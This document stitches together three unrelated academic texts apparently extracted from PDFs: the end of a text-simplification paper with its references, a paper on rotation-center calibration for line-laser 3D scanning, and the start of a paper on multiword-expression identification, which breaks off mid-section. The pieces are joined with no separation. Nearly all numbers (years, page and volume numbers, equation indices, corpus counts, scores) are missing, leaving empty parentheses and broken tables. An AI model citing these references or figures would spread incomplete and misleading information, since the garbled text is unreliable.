finally, we are also interested in designing neural translation models for the simplification task. acknowledgments the authors would like to thank juri ganitkevitch, jonny weese, kristina toutanova, matt post, and shashi narayan for valuable discussions. we also thank action editor stefan riezler and three anony- mous reviewers for their thoughtful comments. this material is based on research sponsored by the nsf under grant iis- and the nsf grfp under grant . the views and conclusions con- tained in this publication are those of the authors and should not be interpreted as representing offi- cial policies or endorsements of the nsf or the u.s. government. this research is also supported by the alfred p. sloan foundation, and by facebook via a student fellowship and a faculty research award. references allen, d. ( ). a study of the role of relative clauses in the simplification of news texts for learners of english. system, ( ): – . amancio, m. a. and specia, l. ( ). an analysis of crowdsourced text simplifications. in proceed- ings of the rd workshop on predicting and im- proving text readability for target reader popu- lations (pitr). angrosh, m., nomoto, t., and siddharthan, a. ( ). lexico-syntactic text simplification and compression with typed dependencies. in pro- ceedings of the th conference of the euro- pean chapter of the association for computa- tional linguistics (eacl). bannard, c. and callison-burch, c. ( ). para- phrasing with bilingual parallel corpora. in pro- ceedings of the rd annual meeting of the asso- ciation for computational linguistics (acl). biran, o., brody, s., and elhadad, n. ( ). putting it simply: a context-aware approach to lexical simplification. in proceedings of the th annual meeting of the association for computa- tional linguistics: human language technolo- gies (acl-hlt). carroll, j., minnen, g., pearce, d., canning, y., de- vlin, s., and tait, j. ( ). simplifying text for language-impaired readers. in proceedings of the th conference of the th european conference for computational linguistics (eacl). chan, t. p., callison-burch, c., and van durme, b. ( ). reranking bilingually extracted para- phrases using monolingual distributional similar- ity. in proceedings of the workshop on geo- metrical models of natural language semantics (mttg). chandrasekar, r., doran, c., and srinivas, b. ( ). motivations and methods for text simpli- fication. in proceedings of the th conference on computational linguistics (coling). chen, b., kuhn, r., and larkin, s. ( a). port: a precision-order-recall mt evaluation metric for tuning. in proceedings of the th annual meet- ing of the association for computational linguis- tics (acl). chen, d. l. and dolan, w. b. ( ). collecting highly parallel data for paraphrase evaluation. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl). chen, h.-b., huang, h.-h., chen, h.-h., and tan, c.-t. ( b). a simplification-translation- restoration framework for cross-domain smt ap- plications. in proceedings of the th interna- tional conference on computational linguistics (coling). chiang, d. ( ). hierarchical phrase-based trans- lation. computational linguistics, ( ): – . clarke, j. and lapata, m. ( ). models for sentence compression: a comparison across do- mains, training requirements and evaluation mea- sures. in proceedings of the st international conference on computational linguistics and th annual meeting of the association for com- putational linguistics (acl-coling). coster, w. 
and kauchak, d. ( a). learning to simplify sentences using wikipedia. in proceed- ings of the workshop on monolingual text-to-text generation. coster, w. and kauchak, d. ( b). simple en- glish wikipedia: a new text simplification task. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies (acl-hlt). dahlmeier, d. and ng, h. t. ( ). better eval- uation for grammatical error correction. in pro- ceedings of the conference of the north american chapter of the association for compu- tational linguistics: human language technolo- gies (naacl-hlt). de belder, j. and moens, m.-f. ( ). text simpli- fication for children. in proceedings of the sigir workshop on accessible search systems. devlin, s., tail, j., canning, y., carroll, j., min- nen, g., and pearce, d. ( ). the application of assistive technology in facilitating the compre- hension of newspaper text by aphasic people. as- sistive technology on the threshold of the new millennium, page . evans, r., orasan, c., and dornescu, i. ( ). an evaluation of syntactic simplification rules for people with autism. in proceedings of the rd workshop on predicting and improving text readability for target reader populations (pitr). felice, m. and briscoe, t. ( ). towards a stan- dard evaluation method for grammatical error de- tection and correction. in proceedings of the conference of the north american chapter of the association for computational linguistics (naacl). feng, l. ( ). text simplification: a survey. the city university of new york, technical report. filippova, k., alfonseca, e., colmenares, c. a., kaiser, l., and vinyals, o. ( ). sentence com- pression by deletion with lstms. in proceedings of the conference on empirical methods in natural language processing (emnlp). filippova, k. and strube, m. ( ). dependency tree based sentence compression. in proceedings of the fifth international natural language gen- eration conference (inlg). galley, m., brockett, c., sordoni, a., ji, y., auli, m., quirk, c., mitchell, m., gao, j., and dolan, b. ( ). deltableu: a discriminative metric for generation tasks with intrinsically diverse tar- gets. in proceedings of the rd annual meeting of the association for computational linguistics (acl). ganitkevitch, j., cao, y., weese, j., post, m., and callison-burch, c. ( a). joshua . : packing, pro, and paraphrases. in proceedings of the sev- enth workshop on statistical machine translation (wmt). ganitkevitch, j., van durme, b., and callison- burch, c. ( b). monolingual distributional similarity for text-to-text generation. in proceed- ings of the first joint conference on lexical and computational semantics (*sem). ganitkevitch, j., van durme, b., and callison- burch, c. ( ). ppdb: the paraphrase database. in proceedings of the conference of the north american chapter of the association for computational linguistics (naacl). gao, m., xu, w., and callison-burch, c. ( ). cost optimization in crowdsourcing translation. in proceedings of the conference of the north american chapter of the association for computational linguistics (naacl). hopkins, m. and may, j. ( ). tuning as rank- ing. in proceedings of the conference on em- pirical methods in natural language processing (emnlp). horn, c., manduca, c., and kauchak, d. ( ). learning a lexical simplifier using wikipedia. in proceedings of the th annual meeting of the as- sociatioin for computational linguistics (acl). hwang, w., hajishirzi, h., ostendorf, m., and wu, w. ( ). 
aligning sentences from standard wikipedia to simple wikipedia. in proceed- ings of the conference of the north ameri- can chapter of the association for computational linguistics (naacl). inui, k., fujita, a., takahashi, t., iida, r., and iwakura, t. ( ). text simplification for read- ing assistance: a project note. in proceedings of the nd international workshop on paraphrasing (iwp). kaji, n., kawahara, d., kurohash, s., and sato, s. ( ). verb paraphrase based on case frame alignment. in proceedings of the th annual meeting on association for computational lin- guistics (acl). kauchak, d. ( ). improving text simplification language modeling using unsimplified text data. in proceedings of the conference of the as- sociation for computational linguistics (acl). kincaid, j. p., fishburne jr, r. p., rogers, r. l., and chissom, b. s. ( ). derivation of new read- ability formulas (automated readability index, fog count and flesch reading ease formula) for navy enlisted personnel. technical report, defence technical information center (dtic) document. knight, k. and marcu, d. ( ). summarization beyond sentence extraction: a probabilistic ap- proach to sentence compression. artificial intelli- gence. liu, c., dahlmeier, d., and ng, h. t. ( ). tesla: translation evaluation of sentences with linear-programming-based analysis. in proceed- ings of the joint fifth workshop on statistical ma- chine translation and metrics (matr). miwa, m., saetre, r., miyao, y., and tsujii, j. ( ). entity-focused sentence simplification for relation extraction. in proceedings of the rd international conference on computational lin- guistics (coling). napoles, c., sakaguchi, k., post, m., and tetreault, j. ( ). ground truth for grammatical error correction metrics. in proceedings of the rd annual meeting of the association for computa- tional linguistics (acl). narayan, s. and gardent, c. ( ). hybrid simpli- fication using deep semantics and machine trans- lation. in proceedings of the nd annual meet- ing of the association for computational linguis- tics (acl). och, f. j. ( ). minimum error rate training in statistical machine translation. in proceedings of the st annual meeting on association for com- putational linguistics (acl). pavlick, e., bos, j., nissim, m., beller, c., durme, b. v., and callison-burch, c. ( ). adding se- mantics to data-driven paraphrasing. in proceed- ings of the rd annual meeting of the associa- tion for computational linguistics (acl). pavlick, e. and callison-burch, c. ( ). simple ppdb: a paraphrase database for simplification. in the th annual meeting of the association for computational linguistics (acl). pellow, d. and eskenazi, m. ( a). an open corpus of everyday documents for simplification tasks. in proceedings of the rd workshop on pre- dicting and improving text readability for target reader populations (pitr). pellow, d. and eskenazi, m. ( b). tracking hu- man process using crowd collaboration to enrich data. in proceedings of second aaai confer- ence on human computation and crowdsourcing (hcomp). petersen, s. e. and ostendorf, m. ( ). text sim- plification for language learners: a corpus anal- ysis. in proceedings of workshop on speech and language technology for (slate). post, m., ganitkevitch, j., orland, l., weese, j., cao, y., and callison-burch, c. ( ). joshua . : sparser, better, faster, server. in proceed- ings of the eighth workshop on statistical ma- chine translation (wmt). rello, l., baeza-yates, r. a., and saggion, h. ( ). 
the impact of lexical simplification by verbal paraphrases for people with and without dyslexia. in proceedings of the th interna- tional conference on intelligent text processing and computational linguistics (cicling). rush, a. m., chopra, s., and weston, j. ( ). a neural attention model for abstractive sentence summarization. in proceedings of the con- ference on empirical methods in natural lan- guage processing (emnlp). siddharthan, a. ( ). syntactic simplification and text cohesion. research on language and com- putation, ( ): – . siddharthan, a. ( ). a survey of research on text simplification. special issue of international journal of applied linguistics, ( ). siddharthan, a. and angrosh, m. ( ). hybrid text simplification using synchronous dependency grammars with hand-written and automatically harvested rules. in proceedings of the th inter- national conference on computational linguis- tics (coling). siddharthan, a. and katsos, n. ( ). reformulat- ing discourse connectives for non-expert readers. in proceedings of the annual conference of the north american chapter of the association for computational linguistics: human language technologies (naacl-hlt). siddharthan, a., nenkova, a., and mckeown, k. ( ). syntactic simplification for improving content selection in multi-document summariza- tion. in proceedings of the th international conference on computational linguistics (col- ing). specia, l., jauhar, s. k., and mihalcea, r. ( ). semeval- task : english lexical simplifica- tion. in proceedings of the sixth international workshop on semantic evaluation (semeval). štajner, s., béchara, h., and saggion, h. ( ). a deeper exploration of the standard pb-smt ap- proach to text simplification and its evaluation. in proceedings of the rd annual meeting of the association for computational linguistics (acl). štajner, s., mitkov, r., and saggion, h. ( ). one step closer to automatic evaluation of text simpli- fication systems. in proceedings of the rd work- shop on predicting and improving text readabil- ity for target reader populations (pitr). sun, h. and zhou, m. ( ). joint learning of a dual smt system for paraphrase generation. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl). vickrey, d. and koller, d. ( ). sentence sim- plication for semantic role labeling. in proceed- ings of the th annual meeting of the associa- tion for computational linguistics: human lan- guage technologies (acl-hlt). watanabe, w. m., junior, a. c., uzêda, v. r., fortes, r. p. d. m., pardo, t. a. s., and aluı́sio, s. m. ( ). facilita: reading assistance for low-literacy readers. in proceedings of the th acm international conference on design of communication (sigdoc). weese, j., ganitkevitch, j., callison-burch, c., post, m., and lopez, a. ( ). joshua . : syntax- based machine translation with the thrax grammar extractor. in proceedings of the sixth workshop on statistical machine translation (wmt). woodsend, k. and lapata, m. ( ). learning to simplify sentences with quasi-synchronous gram- mar and integer programming. in proceedings of the conference on empirical methods in natural language processing (emnlp). wubben, s., van den bosch, a., and krahmer, e. ( ). sentence simplification by monolingual machine translation. in proceedings of the th annual meeting of the association for computa- tional linguistics (acl). xu, w., callison-burch, c., and napoles, c. ( ). problems in current text simplification research: new data can help. 
transactions of the as- sociation for computational linguistics (tacl), : – . xu, w., ritter, a., dolan, b., grishman, r., and cherry, c. ( ). paraphrasing for style. in pro- ceedings of the th international conference on computational linguistics (coling). yatskar, m., pang, b., danescu-niculescu-mizil, c., and lee, l. ( ). for the sake of simplicity: unsupervised extraction of lexical simplifications from wikipedia. in proceedings of the an- nual conference of the north american chapter of the association for computational linguistics: human language technologies (acl-hlt). zhu, z., bernhard, d., and gurevych, i. ( ). a monolingual tree-based translation model for sen- tence simplification. in proceedings of the rd international conference on computational lin- guistics (coling). zollmann, a. and venugopal, a. ( ). syntax augmented machine translation via chart parsing. in proceedings of the workshop on statistical ma- chine translation (wmt). paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , rotation center calibration based on line laser rotating platform lei doudou school of computer science and engineering xi’an technological university xi’an, , china e-mail: ccdd @qq.com liu baolong school of computer science and engineering xi’an technological university xi’an, china e-mail: liu.bao.long@hotmail.com yao huimin eighth of production plant, the company china petrdeum, changqing oilfield, xi’an xi’an, , china abstract—line lasers are of great significance in many fields such as industrial inspection, machine vision, cultural relics identification, mechanical design, and medical oral cavity. the three-dimensional reconstruction of the line laser can accurately obtain the three-dimensional information of the surface of the object, and quickly complete the three-dimensional contour reconstruction of the object to be tested. in the online laser rotation scanning, the object rotates around a certain point, which is a rotation center, and the calibration of the rotation center is the main factor that restricts the accuracy of the three-dimensional contour. at present, the calibration of the center of rotation is mainly obtained by the characteristics of a circle (ball, cylinder, cone, etc.). this paper mainly introduces the basic process of rotating scanning, rotating center, and rotating methods as well as their advantages and disadvantages. first, the basic process of rotating scanning is briefly introduced. secondly, the definition and content of the rotating center are introduced. then, the calibration methods of three rotating centers (ellipse fitting method, symmetry method, plane fitting method) are introduced. finally, the advantages and disadvantages of the three calibration methods and their respective applications are summarized. keywords-line laser; rotary scanning; rotation center; calibration i. introduction in today's life, two-dimensional information can no longer meet people's daily needs. the three- dimensional information has thus been deeply researched and developed. among them, the line laser is widely used in the three-dimensional reconstruction process. 
line laser three-dimensional scanning projects one or more line lasers onto the measured object, extracts the laser stripe from the image, and calculates the three-dimensional data of the surface points along the laser line. usually a high-precision three-coordinate machine, a rotating platform, or a camera working together with the laser sensor is used for positioning, so that the surface of the object to be measured can be scanned completely and its three-dimensional surface data obtained [ ][ ]. according to the mechanical displacement platform used, mechanical scanning is mainly implemented with either a translation platform or a rotary platform; rotating scanning is more convenient and faster. a more accurate rotation center calibration improves the accuracy of point cloud reconstruction and therefore of the three-dimensional contour reconstruction of the measured object. reconstruction with a rotating platform can be divided into three types according to the movement mode: in the first, the camera rotates around the rotating axis [ ] and the measured object does not move; in the second, the camera does not move and the object rotates with the rotating platform [ ]; in the third, the camera and the object are combined and rotated at the same time [ ]. the rotating platform is suitable for scanning objects with rotary features. the object is placed on a rotating platform for line laser rotation scanning. during scanning, the visible object is rigidly transformed around the axis of the rotating platform [ ]. using the rotation center and the rotation angle obtained from the platform calibration process, the rotation matrix between two views can be constructed; multiplying the current point cloud by this rotation matrix registers the point clouds obtained by the left and right cameras into the same coordinate system, thereby realizing automatic registration of the point clouds on the surface of the rotating platform [ ]. ii. camera calibration calibration establishes the transformation between the pixel coordinate system of an image and the three-dimensional world coordinate system; the essence of this transformation is the geometric principle of camera imaging. the ultimate goal of calibration is to obtain the camera's internal parameters as well as its external parameters. the internal parameters are determined by the camera's own characteristics, while the external parameters establish the conversion between the local world coordinate system and the camera coordinate system [ ][ ]. the camera parameters have a direct impact on the accuracy of the reconstructed model, so their accuracy is very important. in general, camera calibration is required before solving for the center of rotation. iii. rotation center calibration because a single line laser scan can only measure the surface of the object visible from one angle of view, measuring the full contour of an object requires rotation: the object is measured from multiple angles of view, and the point cloud data from these views are spliced into the same coordinate system. accurately calibrating the center of the turntable (the rotation center) is the key to rotating measurements and multi-view assembly.
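to illustrate why the calibrated center matters for multi-view assembly, the following sketch rotates one view's point cloud back into the reference view's frame about a known center. it is a minimal illustration, assuming a vertical rotation axis through the calibrated center and numpy arrays of 3-d points; the names and values are hypothetical.

```python
import numpy as np

def rotation_about_z(theta):
    # rotation matrix for an angle theta (radians) about the z axis
    c, s = np.cos(theta), np.sin(theta)
    return np.array([[c, -s, 0.0],
                     [s,  c, 0.0],
                     [0.0, 0.0, 1.0]])

def register_view(points, center, theta):
    # rotate an (n, 3) point cloud, captured after the platform turned by theta,
    # back into the reference frame about the calibrated center
    r = rotation_about_z(-theta)          # undo the platform rotation
    return (points - center) @ r.T + center

# toy usage: a point measured after a 90-degree turn maps back onto its
# original location when the correct rotation center is used
center = np.array([10.0, 5.0, 0.0])       # hypothetical calibrated center
p_before = np.array([[12.0, 5.0, 1.0]])
r_fwd = rotation_about_z(np.pi / 2)
p_after = (p_before - center) @ r_fwd.T + center
print(np.allclose(register_view(p_after, center, np.pi / 2), p_before))  # True
```

with an inaccurate center, the same transformation leaves a residual offset in every registered view, which is why the calibration methods below matter.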
rotation center: in a plane, when a figure is rotated by a certain angle around a point o to obtain another figure, the transformation is a rotation and the point o is the center of rotation. during rotational scanning, the measured object starts from a fixed angle and rotates through a full revolution around the axis of rotation (the center of rotation). however, the center of rotation of the rotating platform is unknown. in order to obtain the three-dimensional contour of the rotating object, the rotation center of the rotating platform must first be obtained by means of a calibration block or pasted marker points. after the center of rotation is obtained, the subsequent rotation and splicing can be performed. since the splicing is carried out according to the position of the center of rotation, extracting the center of rotation accurately is very important. the schematic diagram of the line laser double-triangle rotation scan is shown in the figure below, where the center of rotation is the center of the stage.

figure . schematic diagram of line laser double-triangle rotation scanning (line laser, left and right cameras, object table, rotating platform, rotation direction)

iv. rotation center calibration method

a. ellipse fitting method

the center of rotation can be obtained by segmenting the plane edge of the rotating platform in the left and right images, performing ellipse fitting on the extracted edge, and computing the center coordinates of the ellipse with the least squares method; this center is the rotation center of the rotating platform [ ].

figure . ellipse fitting (point $f$ on the ellipse, foci $l_1$ and $l_2$, center $o$)

as shown in the figure above, the point $f(x, y)$ lies on the ellipse, and the foci of the ellipse are $l_1(x_1, y_1)$ and $l_2(x_2, y_2)$. the center $o$ is equidistant from the two foci, $|o l_1| = |o l_2| = c$. since the sum of the distances from any point on the ellipse to the two foci is the constant $2a$, there is an error $\theta$ between this constant and the sum of the actual measured distances, as in formula ( ):

$|f l_1| + |f l_2| - 2a = \theta$

formula ( ) expands as follows:

$\sqrt{(x - x_1)^2 + (y - y_1)^2} + \sqrt{(x - x_2)^2 + (y - y_2)^2} - 2a = \theta$

using this formula, the point cloud of the elliptical edge can be fitted by the least squares method to obtain estimates of the five parameters $(x_1, x_2, y_1, y_2, a)$, after which the equation is linearized and solved iteratively. the criteria for the iterative solution are: after each ellipse fitting, edge points whose error $|\theta|$ is greater than or equal to a fixed multiple of $\beta$ are eliminated ($\beta$: standard error of unit weight of each iterative fit); between two adjacent iterative fittings, the absolute change in the position of each elliptical focus must fall below a small pixel threshold, at which point the iteration terminates.

to linearize formula ( ), write

$l_1 = \sqrt{(x - x_1')^2 + (y - y_1')^2}, \qquad l_2 = \sqrt{(x - x_2')^2 + (y - y_2')^2}$

and take the partial derivatives of $|f l_1|$ and $|f l_2|$ with respect to $x_1$, $x_2$, $y_1$, $y_2$.
then, to first order, the above formula expands to

$\theta \approx (l_1 + l_2 - 2a') - \frac{x - x_1'}{l_1}\,\delta x_1 - \frac{y - y_1'}{l_1}\,\delta y_1 - \frac{x - x_2'}{l_2}\,\delta x_2 - \frac{y - y_2'}{l_2}\,\delta y_2 - 2\,\delta a$

where $l_1$ and $l_2$ are evaluated at the initial focus coordinates. here $x_1'$, $y_1'$, $x_2'$, $y_2'$ represent the initial values of the focus coordinates, and the unknowns satisfy the relationships

$x_1 = x_1' + \delta x_1$, $x_2 = x_2' + \delta x_2$, $y_1 = y_1' + \delta y_1$, $y_2 = y_2' + \delta y_2$, $a = a' + \delta a$.

the initial position obtained is used as the initial value, and the point cloud data of the ellipse edge are fitted by the least squares method with step-by-step iteration [ ]; the parameters $(x_1, x_2, y_1, y_2, a)$ can then be solved, and the elliptical center $o(x_0, y_0)$ of the last fitting is

$x_0 = \dfrac{x_1 + x_2}{2}, \qquad y_0 = \dfrac{y_1 + y_2}{2}$.

b. symmetry method

since the pattern on the rotating platform, after being rotated by 180 degrees, is symmetric about the center of rotation, several laser lines can be selected on the auxiliary pattern to compute the center of rotation and ensure accuracy. the parameters obtained can finally be optimized by methods such as a bp neural network. in order to accurately calibrate the center of rotation, the equations of the two straight lines $s_1 s_1'$ and $s_2 s_2'$ are fitted on the premise that the rotation angle of the rotating platform is known, and the intersection $o$ of the two lines is found; this intersection point $o$ is the rotation center of the rotating platform. the point $s_1$ is located at the position of point $s_1'$ after being rotated by 180 degrees, and point $s_2$, after being rotated by 180 degrees, is located at point $s_2'$. the points $s_1$, $o$, $s_1'$ are collinear (as are $s_2$, $o$, $s_2'$), and after rotation the points are symmetric, with respect to the rotation center $o$, to their positions before rotation [ ]. the principle of symmetry is shown in the figure below.

figure . symmetric configuration of the points $s_1(x_1, y_1)$, $s_2(x_2, y_2)$ and their rotated images $s_1'(x_1', y_1')$, $s_2'(x_2', y_2')$ about the center of rotation $o$

the calibration process of the symmetry-based rotation platform is:
(1) first, the rotating platform is adjusted to the working position, the auxiliary pattern is pasted on the rotating platform or the circular calibration block is placed, and the line laser is made to pass through the center of the rotating platform;
(2) the rotating platform is rotated by a set angle and data collection is started;
(3) the center coordinates of the laser stripe in the data are extracted as pixel coordinates;
(4) the world coordinates corresponding to the pixel coordinates are calculated and stored in the sample set;
(5) after rotating through 180 degrees, the sample set is exported for calculation of the rotation parameters.

c. plane fitting

in the three-dimensional reconstruction of the rotary scanning mode, the acquired rotating point cloud is plane-fitted in order to fit the rotation center of the rotating platform [ ]. the line laser emitter emits a laser beam that intersects the surface of the calibration block. as shown in the figure below, the line laser is emitted from point a, and bc is the line of intersection between the laser and the calibration block. the plane formed by points a, b, and c is the light plane. the points in the light plane (triangle abc) conform to the plane equation ( ). in line laser scanning, the acquired point clouds all lie in the light plane, so every point cloud satisfies the plane equation ( ):

$ax + by + cz = d$

the $n$ point cloud data obtained by the rotation scan are substituted in turn into the light plane equation above.
this gives the system of equations

$\begin{cases} a x_1 + b y_1 + c z_1 = d \\ a x_2 + b y_2 + c z_2 = d \\ \quad\vdots \\ a x_n + b y_n + c z_n = d \end{cases}$

figure . the light plane: the line laser transmitter at point a, the intersection line bc on the calibration block, and the left and right cameras observing the space laser plane

there are thus $n$ equations in the four unknowns $a$, $b$, $c$, $d$, whose values can be solved by the least squares method. the center of rotation of the rotating platform can then be expressed as the centroid of the fitted points:

$o\left( \dfrac{1}{n}\sum_{i=1}^{n} x_i,\ \dfrac{1}{n}\sum_{i=1}^{n} y_i,\ \dfrac{1}{n}\sum_{i=1}^{n} z_i \right)$

in general, by gradually increasing the height of the rotating platform, a series of center points can be obtained and fitted with a straight line, so that the rotation axis can be calibrated. the coordinate transformation can then be completed through the rodrigues rotation formula [ ]. the comparison between the rotation center calibration methods is shown in table i below.

table i. comparison between rotation center calibration methods

ellipse fitting method. advantage: it can reduce the error in the measurement process and achieves high precision. disadvantage: during the fitting process the number of iterations is variable, so it takes a lot of time. applicable situation: the extracted edge contour is elliptical due to interference from factors such as position and angle, or the calibration block itself is elliptical.

symmetry method. advantage: the principle is simple and easy to understand, and the accuracy is high. disadvantage: multiple locations must be selected for testing and the results averaged, which takes a lot of time. applicable situation: suitable for circular rotating platforms or a circular calibration block; the point cloud obtained by scanning has higher precision.

plane fitting. advantage: the operation is simple, there is no need to manually paste marker points, and the speed is fast. disadvantage: the accuracy is low. applicable situation: suitable for circular rotating platforms or a circular calibration block.

v. conclusion

this paper introduces the basic process of line laser rotation scanning: the measured object starts from a fixed angle and rotates through a full revolution around the rotation axis (rotation center) to obtain the three-dimensional contour of the rotating object. the basic knowledge of the rotating platform's rotation center during the rotary scanning process is introduced, and three rotation center calibration methods are summarized. the principles and steps of these three calibration methods are analyzed in detail, and their advantages, disadvantages, and applications are summarized, laying a theoretical foundation for the study of rotation center calibration methods.

acknowledgment

this work is partially supported by the science & technology program of weiyang district of xi'an city with project " ".

references

[1] choi s, kim p, boutilier r, et al. development of a high speed laser scanning confocal microscope with an acquisition rate up to frames per second[j]. optics express, , ( ): - .
[2] wei z, huadong g, qi l, et al. fine deformation monitoring of ancient building based on terrestrial laser scanning technologies[c]. iop conference series: earth and environmental science. iop publishing, : - .
[3] zhong s d, xiong j, liu y. 3-d reconstruction technology based on full circle multiple views[j]. robot, , ( ): - .
[4] wei h. an approach for multiple-view data capture by a single-view 3d camera using a simple revolve device[j]. journal of applied sciences, .
[5] zhang a w, ming-zhe li, shao-xing hu. 3d surface measurement key technique based on computer vision[j]. systems engineering & electronics, .
[6] zhou l, zheng s. a registration algorithm for point clouds obtained by scanning objects on turntable[j]. acta geodaetica et cartographica sinica, , ( ): - .
[7] xi l, yuexian z, renju li, et al. 3-d surface integration in structured light 3-d scanning[j]. journal of tsinghua university, , ( ): - .
[8] zhang z. a flexible new technique for camera calibration[j]. microsoft research, , ( ): - .
[9] tsai r y. a versatile camera calibration technique for high-accuracy 3d machine vision metrology using off-the-shelf tv cameras and lenses[j]. ieee journal on robotics & automation, , ( ): - .
[10] cheng h, huaming y, zgang j. structural light based computer vision[m]. national defense industry press, .
[11] mingjing c, yuanmin f, jie c. fitting of circular curve based on least square method and iterative method[j]. science of surveying & mapping, .
[12] fuxing l. accuracy analysis of determining coordinates of rotation center of indexing table[j]. mechanical industry standardization and quality, ( ): - .
[13] wq. 3d reconstruction based on the structured light and turntable[d]. university of electronic science and technology, .
[14] zelinsky a. learning opencv: computer vision with the opencv library (bradski, g.r. et al.)[on the shelf][j]. ieee robotics & automation magazine, , ( ): - .

discriminative lexical semantic segmentation with gaps: running the mwe gamut

nathan schneider, emily danchik, chris dyer, noah a. smith
school of computer science, carnegie mellon university, pittsburgh, pa, usa
{nschneid,emilydan,cdyer,nasmith}@cs.cmu.edu

abstract

we present a novel representation, evaluation measure, and supervised models for the task of identifying the multiword expressions (mwes) in a sentence, resulting in a lexical semantic segmentation. our approach generalizes a standard chunking representation to encode mwes containing gaps, thereby enabling efficient sequence tagging algorithms for feature-rich discriminative models. experiments on a new dataset of english web text offer the first linguistically-driven evaluation of mwe identification with truly heterogeneous expression types. our statistical sequence model greatly outperforms a lookup-based segmentation procedure, achieving nearly % f for mwe identification.

introduction

language has a knack for defying expectations when put under the microscope. for example, there is the notion, sometimes referred to as compositionality, that words will behave in predictable ways, with individual meanings that combine to form complex meanings according to general grammatical principles. yet language is awash with examples to the contrary: in particular, idiomatic expressions such as awash with np, have a knack for vp-ing, to the contrary, and defy expectations. thanks to processes like metaphor and grammaticalization, these are (to various degrees) semantically opaque, structurally fossilized, and/or statistically idiosyncratic. in other words, idiomatic expressions may be exceptional in form, function, or distribution.

1. mw named entities: prime minister tony blair
2. mw compounds: hot air balloon, skinny dip
3. conventionally sw compounds: somewhere
4. verb-particle: pick up, dry out, take over, cut short
5. verb-preposition: refer to, depend on, look for
6. verb-noun(-preposition): pay attention (to)
7. support verb: make decisions, take pictures
8. other phrasal verb: put up with, get rid of
9. pp modifier: above board, at all, from time to time
10. coordinated phrase: cut and dry, more or less
11. connective: as well as, let alone, in spite of
12. semi-fixed vp: pick up where <one> left off
13. fixed phrase: scared to death, leave of absence
14. phatic: you're welcome. me neither!
15. proverb: beggars can't be choosers.

figure : some of the classes of idioms in english. the examples included here contain multiple lexicalized words, with the exception of those in (3), if the conventional single-word (sw) spelling is used.

they are so diverse, so unruly, so difficult to circumscribe, that entire theories of syntax are predicated on the notion that constructions with idiosyncratic form-meaning mappings (fillmore et al., ; goldberg, ) or statistical properties (goldberg, ) offer crucial evidence about the grammatical organization of language. here we focus on multiword expressions (mwes): lexicalized combinations of two or more words that are exceptional enough to be considered as single units in the lexicon. as figure illustrates, mwes occupy diverse syntactic and semantic functions. within mwes, we distinguish (a) proper names and (b) lexical idioms. the latter have proved themselves a "pain in the neck for nlp" (sag et al., ). automatic and efficient detection of mwes, though far from solved, would have diverse applications including machine translation (carpuat and diab, ), information retrieval (newman et al., ), opinion mining (berend, ), and second language learning (ellis et al., ).

it is difficult to establish any comprehensive taxonomy of multiword idioms, let alone develop linguistic criteria and corpus resources that cut across these types. consequently, the voluminous literature on mwes in computational linguistics (see § , baldwin and kim ( ), and ramisch ( ) for surveys) has been fragmented, looking (for example) at subclasses of phrasal verbs or nominal compounds in isolation. to the extent that mwes have been annotated in existing corpora, it has usually been as a secondary aspect of some other scheme. traditionally, such resources have prioritized certain kinds of mwes to the exclusion of others, so they are not appropriate for evaluating general-purpose identification systems.

in this article, we briefly review a shallow form of analysis for mwes that is neutral to expression type, and that facilitates free text annotation without requiring a prespecified mwe lexicon (§ ). the scheme applies to gappy (discontinuous) as well as contiguous expressions, and allows for a qualitative distinction of association strengths. in schneider et al. ( ) we have applied this scheme to fully annotate a , -word corpus of english web reviews (bies et al., a), a conversational genre in which colloquial idioms are highly salient. this article's main contribution is to show that the representation, constrained according to linguistically motivated assumptions (§ ), can be transformed into a sequence tagging scheme that resembles standard approaches in named entity recognition and other text chunking tasks (§ ). along these lines, we develop a discriminative, structured model of mwes in context (§ ) and train, evaluate, and examine it on the annotated corpus (§ ). finally, in § and § we comment on related work and future directions.
annotated corpus to build and evaluate a multiword expression ana- lyzer, we use the mwe-annotated corpus of schnei- der et al. ( ). it consists of informal english web text that has been specifically and completely anno- tated for mwes, without reference to any particular lexicon. to the best of our knowledge, this corpus is the first to be freely annotated for many kinds of mwes (without reference to a lexicon), and is also the first dataset of social media text with mwe an- notations beyond named entities. this section gives a synopsis of the annotation conventions used to de- velop that resource, as they are important to under- standing our models and evaluation. rationale. the multiword expressions community has lacked a canonical corpus resource comparable to benchmark datasets used for problems such as ner and parsing. consequently, the mwe litera- ture has been driven by lexicography: typically, the goal is to acquire an mwe lexicon with little or no supervision, or to apply such a lexicon to corpus data. studies of mwes in context have focused on various subclasses of constructions in isolation, ne- cessitating special-purpose datasets and evaluation schemes. by contrast, schneider et al.’s ( ) cor- pus creates an opportunity to tackle general-purpose mwe identification, such as would be desirable for use by high-coverage downstream nlp systems. it is used to train and evaluate our models below. the cor- pus is publicly available as a benchmark for further research. data. the documents in the corpus are online user reviews of restaurants, medical providers, retailers, automotive services, pet care services, etc. marked by conversational and opinionated language, this genre is fertile ground for colloquial idioms (nunberg et al., ; moon, ). the reviews ( , words, , sentences) in the english web tree- bank (wtb; bies et al., b) were collected by google, tokenized, and annotated with phrase struc- ture trees in the style of the penn treebank (marcus et al., ). mwe annotators used the sentence and word tokenizations supplied by the treebank. annotation scheme. the annotation scheme itself was designed to be as simple as possible. it consists of grouping together the tokens in each sentence that belong to the same mwe instance. while annotation guidelines provide examples of mwe groupings in a wide range of constructions, the annotator is not http://www.ark.cs.cmu.edu/lexsem/ because we use treebank data, syntactic parses are available to assist in post hoc analysis. syntactic information was not shown to annotators. # of constituent tokens ≥ total strong weak # of gaps table : counts in the mwe corpus. tied to any particular taxonomy or syntactic structure. this simplifies the number of decisions that have to be made for each sentence, even if some are difficult. further instructions to annotators included: • groups should include only the lexically fixed parts of an expression (modulo inflectional morphology); this generally excludes determiners and pronouns: made the mistake, pride themselves on. • multiword proper names count as mwes. • misspelled or unconventionally spelled tokens are interpreted according to the intended word if clear. • overtokenized words (spelled as two tokens, but conventionally one word) are joined as multiwords. clitics separated by the tokenization in the corpus— negative n’t, possessive ’s, etc.—are joined if func- tioning as a fixed part of a multiword (e.g., t ’s cafe), but not if used productively. gaps. 
